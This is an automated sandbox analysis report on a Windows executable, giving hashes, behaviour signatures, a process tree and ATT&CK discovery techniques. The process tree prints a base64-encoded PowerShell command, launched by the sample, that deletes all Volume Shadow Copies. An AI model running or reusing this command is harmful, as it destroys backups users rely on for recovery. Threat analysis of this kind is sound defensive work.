Analysis

  • max time kernel
    145s
  • max time network
    131s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 01:50

General

  • Target

    7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe

  • Size

    171KB

  • MD5

    999660513492abf77dcd46db5ae97f17

  • SHA1

    2c75960079eb449183dc284ca64845f663ab5a61

  • SHA256

    7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678

  • SHA512

    d988bde1189122a268dbbad2b61459b1238884d79a22cf7a4e52dfb4cd3f87ca3e1e31d30b71a58a99d54446d5ae3f7d117f4eae4fbf715a761da61845666f46

Score
6/10

Malware Config

Signatures

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
    "C:\Users\Admin\AppData\Local\Temp\7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe"
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1212
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:524
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1380
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:836

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/524-55-0x000007FEFBE91000-0x000007FEFBE93000-memory.dmp
      Filesize

      8KB

    • memory/524-57-0x0000000002840000-0x0000000002842000-memory.dmp
      Filesize

      8KB

    • memory/524-58-0x0000000002842000-0x0000000002844000-memory.dmp
      Filesize

      8KB

    • memory/524-59-0x0000000002844000-0x0000000002847000-memory.dmp
      Filesize

      12KB

    • memory/524-56-0x000007FEF3460000-0x000007FEF3FBD000-memory.dmp
      Filesize

      11.4MB

    • memory/524-60-0x000000001B830000-0x000000001BB2F000-memory.dmp
      Filesize

      3.0MB

    • memory/524-61-0x000000000284B000-0x000000000286A000-memory.dmp
      Filesize

      124KB

    • memory/1212-54-0x0000000075891000-0x0000000075893000-memory.dmp
      Filesize

      8KB